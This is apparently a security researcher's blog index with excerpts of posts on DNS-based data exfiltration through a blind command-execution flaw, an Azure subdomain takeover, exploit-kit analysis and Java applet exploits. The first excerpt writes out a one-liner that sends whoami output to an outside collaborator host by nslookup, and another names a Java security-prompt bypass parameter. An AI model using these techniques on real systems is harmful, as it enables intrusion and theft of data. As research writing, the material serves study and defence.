Posts

Exfiltrating data from a restricted Windows environment using DNS

This post aims to show you how i was able to perfom an initial reconnaissance within the operating system without the need to rely on other tools such as PowerShell, certutil or Living Off The Land (LOLBIN) binaries. Scenario:  Java Web Application vulnerable to a blind Remote Command Execution Egress filtering rules allowing only DNS protocol Operating System Windows Server 2003 After having found the vulnerability, the initial commands that i needed were "whoami" and "cd". So, the idea was to save the output of a command within a file and prepend its content to the burp collaborator domain name and perform a DNS query to get its output as subdomain. nslookup [OUTPUT COMMAND]. agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net For example: whoami>myfile set /p v1= <tmpfile cmd /v /c "echo nslookup %v1%.agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net" The oneliner whoami > tmpfile && set /p v1= < tmpfile && cmd /v /c

Telecom Italia (TIM) - Azure subdomain takeover

Image
Subdomain takeover is a known technique being popular in the latest years with the advent of the cloud providers. At the end of April i was able to takeover timcafe.tim.it subdomain which belongs to Telecom Italia network.  What is subdomain takeover ?  Basically, subdomain takeover is the process of hijacking someone else subdomain. Let’s make an example. When a company hosts a websit e in the   cloud let's say contoso.com hosts a web application on a cloud provider, they create a cloud application which has an unique DNS name, for example myapp.cloudprovider.com. Then, contoso.com wants to reach the web application from one of its subdomains, so they create a Canonical Name Record (CNAME) record on their DNS servers for myapp.contoso.com  that maps one domain name (an alias) to another (the canonical name). In this case myapp.contoso.com is mapped to myapp.cloudprovider.com. Now if you resolv the domain name, this will be the output:  myapp.contoso.com CNAME  myapp.cloudprovider

Styxy Cool Exploit Kit: One Applet to Exploit All Vulnerabilities

Image
Styxy Cool Exploit Kit is a particular kit because it is a "merge" between Cool and Styxy Exploit Kit. Here we are going to cover only Java related exploits so, if you want to know what vulnerabilities it has and why its called Styxy Cool go check Kafeine's post  here . Between the eight and nine of July two interesting things happened: Jar size increased from 5Kb to 28 Kb Payload (Reveton) disappeared from fiddler  Let's take a step back and analyze the exploit chain from the eight of July. The first page /abortion-success_conductor.php  displays a bounch of phrases about Yahoo France, but what really does is checking if you have some vulnerable Java plugin installed in your browser. The page contains an instance of PluginDetect version 0.8 plus an obfuscated JavaScript code. What does this code do ? It takes the content of the textarea from / objection_confident_sulphur.html since in the middle of the first page there is an iframe pointin

The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423)

Image
From Java SE 7 update 11 oracle has introduced a new security features called  security warning that prompts a window every time an applet request for execution. For example, if we want to execute latest Java SE 7 update 17 exploit we get this warning. Yesterday Immunity has published a blog post explaining a new vulnerability they have found into the java validating mechanism which allow to execute an untrusted applet without showing the warning. For in-dept details read their blog post here . Briefly, to bypass the above prompt you must call the applet with the parameter __applet_ssv_validated set to true. The only way to manipulate this parameter is to use a java Network Launch Protocol file. Regarding to oracle there are two ways to use JNLP in a page: With the applet tag  With javascript only Let's try first the example with the tag applet. The code we're going to run is the latest publicly available java exploit CVE-2013-2423 .  import java.applet.

32 AntiVirus versus the latest Java Exploit (CVE-2013-1493)

Image
Image a scenario where someone wants to target your computer to get access to your files. This task can be accomplished in several ways and one of them is using a java exploit on a crafted/compromised website. What i want to test is how AntiVirus manage "unknown" threads or forbidden behavior (an unsigned applet shouldn't be allowed to download files to your local disk). This test is based on basic/home/free products like Symantec AntiVirus and not Symantec Internet Security which has more features. Some companies provide only Internet Security suites so this cannot be a fully comparison between these products. I tried to test all AntiVirus in this list but i came out with only 32, because some of them don't provide a free trial and the others i was unable to find it or install it. The important thing is that i covered all major/popular AntiVirus. Testing machine is a Windows 7 SP1 32 bit fully patched on Virtualbox with Java SE 7 update 15 an

Deobfuscating Java 7u11 Exploit from Cool Exploit Kit (CVE-2013-0431)

Image
At the beginning of the past week @EKWatcher  has spotted Cool Exploit Kit using Java 7 update 11 vulnerability (CVE-2013-0431). This vulnerability was already reported by Security Explorations on seclist few days after Oracle issued update 11. I decided take a look at it. I found a website infected by Cool EK that after a successfull exploitation dropped Reveton into " C:\Documents and Settings\<usarname>\Application Data " folder on Windows XP. The applet used by Cool EK was named would-blood.jar and once opened with JD-GUI the result was this. As you can see it's obfuscated, not heavily but obfuscated. The first thing to do when you want to start deobfuscating an applet is to find the init() function which is the "starting point" and cannot be changed. Remember that for serialized applets the starting point is a function called start() instead of init(). The init function is inside  hw class. It's immediately evident that al